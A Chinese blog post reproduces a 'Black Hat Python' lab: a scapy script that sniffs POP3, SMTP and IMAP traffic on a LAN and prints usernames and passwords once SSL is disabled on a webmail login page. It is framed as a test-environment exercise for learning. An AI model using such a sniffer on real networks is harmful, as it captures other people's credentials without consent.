网站首页 > 技术文章 正文
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第8个实验(抓取邮箱密码),我的测试环境是mbp电脑+kali虚拟机+conda开发环境。使用中科大邮箱(备注:马上要高考了,欢迎报考中科大,我们是终身邮箱哦~),这里默认打上了SSL安全登录,修改前端页面代码就可以绕过限制,便能轻松抓取局域网所有用户和密码,前提是取消SSL打勾,现在主流邮箱都已经加密了,所有只有在实验环境下才能成功~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、2015年上学的时候SSL还没有打勾,现在安全要求高了,默认打勾了,需要修改一下前端页面,取消打勾,否则抓取不到明文
2、在mbp上运行脚本,并访问中科大邮箱,就能抓取到邮箱的用户名和密码的明文,如果打勾SSL,就看不到明文了
3、在kali虚拟机上访问中科大邮箱,同样可以抓取到用户名和密码,也就是说只要是局域网里面的所有人访问中科大邮箱,都能抓取到他们的用户名和密码
参考代码:
# -*- coding: utf-8 -*-
# @Time : 2022/6/6 7:35 PM
# @Author : ailx10
# @File : mail_sniffer.py
from scapy.all import *
from scapy.layers.inet import IP,TCP
from scapy.config import conf
conf.use_pcap = True
def packet_callback(packet):
if packet.haslayer(TCP):
if packet[TCP].payload:
mypacket = str(packet[TCP].payload)
if "user" in mypacket.lower() or "pass" in mypacket.lower():
print(f"[*] Destination :{packet[IP].dst}")
print(f"[*] {str(packet[TCP].payload)}")
def main():
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)
if __name__ == "__main__":
main()
发布于 2022-06-06 19:54
猜你喜欢
- 2025-06-18 SQL注入:程序员亲手打开的潘多拉魔盒,如何彻底封印它?
- 2025-06-18 Java项目本地部署宝塔搭建实战Java物业小程序源码物业系统源码
- 2025-06-18 如何安全地保障用户Web登录安全?(web登录安全方案)
- 2025-06-18 如何发个 npm 包?(npm发包流程)
- 2025-06-18 大华信息安全|WEB和Configtool密码重置
- 2025-06-18 某实战项目登录口处的渗透测试(渗透实战测试平台)
- 2025-06-18 Spring Boot 中密码加密的两种姿势
- 2024-10-04 用户名或密码不正确?锁定? 用户名或密码不正确,请重新输入!
- 2024-10-04 通过sql注入获取用户名和密码 192.168.1.1路由器登录入口用户名和密码
- 2024-10-04 常见的密码攻击方式及防范措施 密码攻击是什么
你 发表评论:
欢迎- 532℃Oracle分析函数之Lag和Lead()使用
- 531℃几个Oracle空值处理函数 oracle处理null值的函数
- 529℃Oracle数据库的单、多行函数 oracle执行多个sql语句
- 519℃0497-如何将Kerberos的CDH6.1从Oracle JDK 1.8迁移至OpenJDK 1.8
- 514℃Oracle 12c PDB迁移(一) oracle迁移到oceanbase
- 505℃【数据统计分析】详解Oracle分组函数之CUBE
- 484℃最佳实践 | 提效 47 倍,制造业生产 Oracle 迁移替换
- 483℃Oracle有哪些常见的函数? oracle中常用的函数
- 最近发表
- 标签列表
-
- 前端设计模式 (75)
- 前端性能优化 (51)
- 前端模板 (66)
- 前端跨域 (52)
- 前端缓存 (63)
- 前端react (48)
- 前端aes加密 (58)
- 前端脚手架 (56)
- 前端md5加密 (54)
- 前端富文本编辑器 (47)
- 前端路由 (61)
- 前端数组 (73)
- 前端排序 (47)
- 前端密码加密 (47)
- Oracle RAC (73)
- oracle恢复 (76)
- oracle 删除表 (48)
- oracle 用户名 (74)
- oracle 工具 (55)
- oracle 内存 (50)
- oracle 导出表 (57)
- oracle 中文 (51)
- oracle的函数 (57)
- 前端调试 (52)
- 前端登录页面 (48)
本文暂时没有评论,来添加一个吧(●'◡'●)